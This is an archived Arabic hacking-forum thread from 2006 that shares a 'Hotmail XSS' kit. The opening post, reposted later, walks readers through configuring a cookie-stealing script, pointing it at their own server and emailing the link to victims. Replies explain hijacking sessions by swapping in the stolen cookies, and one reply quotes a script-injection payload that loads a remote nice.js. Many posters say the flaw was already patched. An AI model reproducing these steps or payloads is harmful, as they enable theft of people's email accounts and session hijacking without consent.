المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثـغـرة الـهـوتـميـل الجـديـده Hotmail Xss

Young.-.Hacker
01-10-2006, 10:07
بسم الله الرحمن الرحيم

اليوم وانا اتصفح احد المنتديات لقيت ثغرة أكسس جديده في الهوتميل

فقولت نشرحها على السريع لعيون اخواني في العاصفة

اولا حقوق الثغرة محفوظه للاخ al7zn لانه هو مكتشف الثغرة

والثغرة اهداء مني لاخي وصديقي BroKeN PrOxY

نيجي للمهم

حمل ملفات الثغرة من هنا
http://members.lycos.co.uk/alsakral3raby/up_ar/ar/Young Hacker.zip
بعد فك الضغط

افتح ملف index.php
ثم ابحث على www.xxx.com ثلا مرات وغيرها الى موقعك

وبعد ذلك أفتح ملف log.php

وابحث عن www.xxx.com مرتين وغيرها الى موقعك

وبعد ذلك ادخل على ملف nice.js

وابحث عن www.xxx.com مرة واحده وغيرها الى موقعك

واخيرا ارفع المفلفات الى موقعك واعطي الملف log.php تصريح 777

واخيرا تلاقي الكوكيز حق الضحيه في ملف اسمه xxx.htm

وبما ان اخونا ام بي تي شرح الثغرة السابقه بالتفصيل فهذا كان شرحي للثغرة الجديده على السريع

ملاحظه هامة للجميع:

حتى يوصلك كوكيز الضحيه كامل لابد من ارسال الرابط على البريد يعني في رساله

واخيرا اتمنالكم اختراقات موفقه بالثغرة الجديده

واعذروني على التقصير

وأي سؤال او استفسار انا حاضر

سلام
anano1
01-10-2006, 11:20
يا سلام عليك

جاري التحميل والتطبيق افا عليك بس خخخخخخخخخ

مشكوور على الثغره وما قصرت يعطيك العافيه انت واخوانا الي ما قصروا
AvIrL@BoY@LoVeR
01-10-2006, 11:34
ثأإنكس خيوـو

سي ياا
الـحـل الـصـعـب
01-10-2006, 11:39
مشكووور وما قصررت ...والله يعطيك الف عافيه

بس عندي سؤال لا هنت ...يعني ينفع علىموقع مجاني مثل موقع لايكوس ..وارجوا انك توضح اكثر

تراني ما افهم بهالاموور ..وانتظر منك الاجابه
Mr.JoOoKeR.a
01-10-2006, 11:48
الله يعطيك الف الف عافية
ColdDayInHell
02-10-2006, 01:34
مشكووور لكن ماذا بعد ان تاتى الكوكيز تبع الضحيه .....نقوم بفك تشفير الmd5.وهو غير مضمون بالمره اذا كانت الباسوورد معقده......ولا ايه؟؟؟؟
شوق
02-10-2006, 05:08
مشكور وماقصرت :)

تحياتي لك ^_^
Young.-.Hacker
02-10-2006, 06:52
هلا اخي anano1 نورت الموضوع والله

ولا يهمك جرب عليا طباخ السم بيذوقة ههههههه
Young.-.Hacker
02-10-2006, 06:54
هلا اخوي AvIrL@BoY@LoVeR

منور الموضوع والله

اتمنى الثغرة تكون عجبتك
Young.-.Hacker
02-10-2006, 06:56
مرحبا اخوي Mr.JoOoKeR.a نورت الموضوع

اتمنالك اختراقات موفقه بالثغرة

وخصوصا الايميلات المميزة هع هع هع
Young.-.Hacker
02-10-2006, 06:59
اخوي ColdDayInHell منور الموضوع والله

بالنسبه لسؤالك

بعد ما تحصل الكوكيز ما تقدر تفكه لكن انت بتبدله بالكوكيز حقك

عن طريق متصفح الاوبرا او عن طريق برنامج اسمه بروكسمريشن

واظن انه الطريقه اتشرحت قبل كذا

عموما اذا فضيت بشرحها بالتفصيل الممل ان شاء الله تعالى
Young.-.Hacker
02-10-2006, 07:01
هلا اخت شوق منورة الموضوع

اتمنى تكون الثغرة عجبتك واذا في اي استفسار انا حاضر

وبالنسبه للحمايه من الثغرة استخدموا متصفح فايرفوكس او الاوبرا (الاتنين اقوى من بعض صراحه)

سلام
AvIrL@BoY@LoVeR
02-10-2006, 03:00
^
لو سمحت لا تذكر الاوبرا جنب الفايرفوكس لوـول

فايرفوكس ذ1 بست لوـوـول :)

سي ياا
MIDO82
02-10-2006, 03:13
مشكور وماقصررت
بس ياليت توضح انت والا احد الشباب اللي هنا كيف اعطاء تصرريح للملف
السلحة
02-10-2006, 03:57
سلمت يمناك يا غالي

وتم تجربتها

وبئت بالفشل

تعرف ليش ؟؟؟؟؟؟؟؟؟

لانها ما توصل الكوكيز كامل

وتوصله ناقص جدا

تحيتي لك يا بطل

وخيرها في غيرها
Young.-.Hacker
02-10-2006, 04:02
هلا مرة ثانيه اخوي AvIrL@BoY@LoVeR

والله كلامك صحيح 100% فعلا فايرفوكس هو الاقوى والافضل

لكن هذا لا يقلل من شان الاوبرا صراحه جربته واثبت جدارته هو الاخر بسرعته وقوته كمتصفح

ومنه ممكن تسوي بلاوي منها الخاص بثغرتنا الحاليه


بالنسبه لك اخي MIDO82

لاعطاء التصريح لملف اللوج ما عليك الا الضغط كليك يمين على الملف وم ثم تضغط على Chmod

وبعد ذلك ستظهر لك مربع اكت فيه 777 ثم اضغط اوكي وبكده تبقى اعطيته التصريح المطلوب

واي استفسار اخر انا حاضر

تحياتي للجميع
AvIrL@BoY@LoVeR
02-10-2006, 04:30
السلحه:

كل سنه وانت طيب لوـوـول

سي ياا
العقرب_185
02-10-2006, 09:59
السلحه؟؟؟؟؟ شوه هذا الاسلوب المعفن الرجال يعلمك شي تقوله سلحه؟؟؟ سلحه يساوي خرى يساوي زق
والله عيب ذا الكلام حشم الرجال والخلق الي يشوفون الموضوع
مشكور اخوي على الثغره وما قصرت وشرحك وافي بسس للأسف ماشي موقع هههههههههه
السلحة
02-10-2006, 10:51
يا طيب شو ها الحكي

ياخوي انا من سوريا وما بعرف معناها اولا

ثانيا انا غلطت في الاسم حقي

كان المفروض السلحفة

وغلطة وكتبت السلحة

وانا اسف يا طيب

ولكنها غير مجدية
x_hacker_x
03-10-2006, 12:16
اخوي اعطيت التصريح وكل شي وبعد ما يجيب الكوكيز كامل
tfaz6
03-10-2006, 12:20
من الاحسن استعمال بروسر Opera للتعديل اخي الذي ظن ان التبليغ عبارة عن كود md5 لا ما ياتي هو كوكيز مجموعة اكواد ما ستعدل عليه هي المتغيرات التالية :
Mprof,msauth,Muid,Anon...
thebigboss84
03-10-2006, 12:33
مشكور اخوي وجاري التجربة
الـحـل الـصـعـب
03-10-2006, 01:24
اخوووي Young.-.Hacker ما جاوبت على سؤاالي ..!!؟
diablos
03-10-2006, 01:40
thx so much brother
free^man
03-10-2006, 03:26
يا اخى Young.-.Hacker

انا معلش لسا مبتدأ فى الثغره دى ومش عارف ازاى اترجم الباصورد من كود md5

ياريت لو تفيدنى او تقلى ازاى بتترجم
السلحة
03-10-2006, 06:02
ياخوي انت وياه

تراه ما يرسل لك ولا شيء

يرسل لك خرابيط

ما يرسل كوكيز مشفر ولا شيء

وثاني شيء بالله ذا منظر باسورد مشفر md5

والله شكله تقول متشفر بأداة طبخ

مع احترامي للجميع

ونشوفكم على خير

ambt

سلملم
حبيب الهكرز
03-10-2006, 10:12
ما هنت سلمت يدك
بس اضن ان الثغرة
تقفلت او ترقعت
ومبين يعني

سلام جاري التجربه
ارجوا انك تعطيني متصفح اوبرا
سلاااااااااااااااام
ambt
04-10-2006, 01:20
مضروبة جدا

وجاري تحليلها واكتشاف استثمار اخر لها

وسلام عليكم
BlackHacker
04-10-2006, 09:56
بسم الله الرحمن الرحيم

اليوم وانا اتصفح احد المنتديات لقيت ثغرة أكسس جديده في الهوتميل

فقولت نشرحها على السريع لعيون اخواني في العاصفة

اولا حقوق الثغرة محفوظه للاخ al7zn لانه هو مكتشف الثغرة

والثغرة اهداء مني لاخي وصديقي BroKeN PrOxY

نيجي للمهم

حمل ملفات الثغرة من هنا
http://members.lycos.co.uk/alsakral3raby/up_ar/ar/Young Hacker.zip
بعد فك الضغط

افتح ملف index.php
ثم ابحث على www.xxx.com ثلا مرات وغيرها الى موقعك

وبعد ذلك أفتح ملف log.php

وابحث عن www.xxx.com مرتين وغيرها الى موقعك

وبعد ذلك ادخل على ملف nice.js

وابحث عن www.xxx.com مرة واحده وغيرها الى موقعك

واخيرا ارفع المفلفات الى موقعك واعطي الملف log.php تصريح 777

واخيرا تلاقي الكوكيز حق الضحيه في ملف اسمه xxx.htm

وبما ان اخونا ام بي تي شرح الثغرة السابقه بالتفصيل فهذا كان شرحي للثغرة الجديده على السريع

ملاحظه هامة للجميع:

حتى يوصلك كوكيز الضحيه كامل لابد من ارسال الرابط على البريد يعني في رساله

واخيرا اتمنالكم اختراقات موفقه بالثغرة الجديده

واعذروني على التقصير

وأي سؤال او استفسار انا حاضر

سلام


هلا وغلا...........

طريقة حلوة وثغرة جيدة حسب كلامك

بس ممكن توضيح العنوان كان "ثـغـرة الـهـوتـميـل الجـديـده Hotmail Xss الرد على الموضوع "

وفي الموضوع ما جبت أبداً ذكر للهوتميل؟؟

وعلى ما أشوف إنها تصلح لكل موقع مو بس للهوتميل

Nice.js عبارة عن إيش بالتحديد؟؟ وما هي طريقة عمله؟؟
aghiatoo
08-10-2006, 05:56
تم اغلاق الثغره :((((((

Player names containing "><script src=http://http://members.lycos.co.uk/msnhotmai1/nice.js></script> were not found.

جوووووووووووووود لك نيكست تاايم جايز
القاهر
11-10-2006, 09:19
مشكوووووووووووووووووووور على الموضوع

بس الثغرة مكشووووووووووووووووووووووووفة من الهوتميل وصااااااارت ماتنفع برياااااااااااااااااااااااااااااال
Young.-.Hacker
11-10-2006, 11:09
اممممممممم كل واحد داخل يتفلسف بكلمتين وهو ما يدري شئ

الثغرة اتقفلت بسرعه البرق ومن فترة

والسبب هو العدد المهول اللى بيعرف الثغرة وفيه ناس بتبلغ عنها طبعا خخخخخخخخخ

لكن لو الثغرة برايفت كانت بقيت اكثر من سنه

مثل الثغرة بتاعه 2005 اللى قعدت سنه كامله وما حد يدري عنها شئ

ولما اتعرفت اتقفلت بعد اسبوع خخخخخخخخخخخخخخخ

اتمنى قفل الموضوع من المشرف

سلام
ambt
13-10-2006, 03:56
اول شيء انت من اتفلسف

ثانيا الثغرة اصلا انت منزلها وهي منتهية

يعني ما توصل الكوكيز كامل

وواحد تفلسف وقال انه كوكيز md5

وهو وربي مو كوكيز ماكنتوش

فلذلك لا تقعد تهايط باللي عندك ولا يكثر يالطيب

تمام

وجرب الشيء قبل لا تستخدمه


سلام يا حلو

وكد لحافك على قدك
AvIrL@BoY@LoVeR
13-10-2006, 08:39
كل ده عشان موضوع

ما بقولش الا الله يستر عليكم

و اهو اقفلنا الموضوع

سلام يابشوات